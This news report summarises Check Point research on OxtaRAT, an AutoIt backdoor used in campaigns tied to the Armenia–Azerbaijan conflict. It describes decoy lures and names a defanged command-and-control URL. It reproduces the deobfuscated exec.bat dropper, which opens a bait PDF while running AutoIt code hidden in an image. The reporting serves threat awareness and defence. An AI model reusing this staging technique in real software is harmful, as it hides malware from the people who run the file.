Amid growing tensions between Azerbaijan and Armenia over the Lachin corridor, Check Point Research has identified a malware campaign against organizations in Armenia in late 2022. The malware distributed as part of this campaign is a new version of the backdoor we're tracking as OxtaRAT, an AutoIt-based tool for remote access and desktop surveillance, research.checkpoint.com reports.

The newest version of OxtaRAT is a polyglot file that combines a compiled AutoIT script with an image. The tool's capabilities include searching and retrieving files from an infected machine, recording webcam and desktop video, remotely controlling an infected machine using TightVNC, installing a web shell, and more.

AutoIT is a legitimate tool used by many IT administrators to automate tasks, but is often abused by threat actors. In this case, attackers are using a full-featured backdoor containing about 20,000 lines of obfuscated AutoIt code:

The situation in Artsakh is tense, with frequent ceasefire violations and sporadic outbreaks of violence. For more than two decades, this unresolved, highly militarized ethno-nationalist territorial conflict has remained a source of tension between Armenia and Azerbaijan," the authors note.

The malicious file named Israeli_NGO_thanks_Artsakh_bank_for_the_support_of.scr was submitted to VirusTotal (VT) on November 29, 2022 from an IP address located in Yerevan, Armenia.

It is a self-extracting archive masquerading as a PDF file and has a PDF icon. Once executed it gets into the Temp folder of the infected device and runs a self-extracting file named Alexander_Lapshin.EXE. It, in turn, resets several additional files and launches one of them, the exec.bat script. In its deobfuscated form, this script is very short:

@echo off

xcopy /y /e /k /h /i * %appdata%\Autoit3\

copy /b /y %appdata%\Autoit3\Alexander_Lapshin.pdf %temp%\

run %temp%\Alexander_Lapshin.pdf

run %appdata%\Autoit3\Autoit3.exe %appdata%\Autoit3\icon.png

exit

The file exec.bat is responsible for opening the PDF bait containing the Wikipedia article about Alexander Lapshin. At the same time in the background it copies some auxiliary files and the AutoIt interpreter into %appdata%\Autoit3\ and uses them to execute the malicious AutoIt code, hidden inside the image called icon.png.

Alexander Lapshin, a Russian-Israeli travel blogger, journalist, and human rights activist, was detained in Belarus in 2016 and extradited to Azerbaijan. He was sentenced to three years in prison for illegally crossing Azerbaijan's internationally recognized borders without permission from Azerbaijani authorities in 2011 and 2012 while visiting Nagorno-Karabakh from Armenia. Nine months after his imprisonment, in September 2017, Lapshin was attacked in solitary confinement in a Baku detention center. Azerbaijani officials publicly declared the attack a suicide attempt. He was then pardoned by the president of Azerbaijan and deported to Israel.

In 2021, the European Court of Human Rights ruled in the case of Lapshin v. AZERBAIJAN that Lapshin's right to life was violated by Azerbaijani authorities and ordered Azerbaijan to pay 30,000 euros in compensation. After the verdict, Lapshin publicly published a photo of the credit card he opened to receive the compensation issued by the Armenian Artsakhbank. This incident probably made Lapshin's name attractive to the attackers who attacked the bank.

Previous versions of the OxtaRAT backdoor were used in earlier attacks on Azerbaijani political and human rights activists - or, when targets were not publicly disclosed, their lures referred to tensions between Azerbaijan and Armenia over Artsakh. The older versions of OxtaRAT have significantly less functionality than the new version, but contain similar code and names of most commands and the same C&C communication scheme.

Last February Qurium reported another attack, this time on Abulfaz Gurbanly, an Azerbaijani political activist. The attackers posed as BBC journalists and, similarly to the June 2021 attacks, sent the victim an email containing a link to Google Drive pointing to a password-protected RAR archive called BBC-suallar.rar ("BBC issues"). Again, an AutoIT compiled executable called suallar.scr was extracted. This time it was masquerading as a Word document with a Word icon. Once executed, it presented a tempting DOC file called smm-fraza.doc.

In the background, it downloaded from the C&C server https://smartappsfoursix[.]xyz/wp-feed.php and ran another version of OxtaRAT. This is a more advanced version compared to the 2021 attacks, with many additional commands added.

All the samples from this and previous campaigns are linked to the interests of the Azerbaijani government; they either target Azerbaijani political and human rights activists or, if the targets have not been publicly disclosed, refer to the tense relations between Azerbaijan and Armenia over Artsakh, the article notes.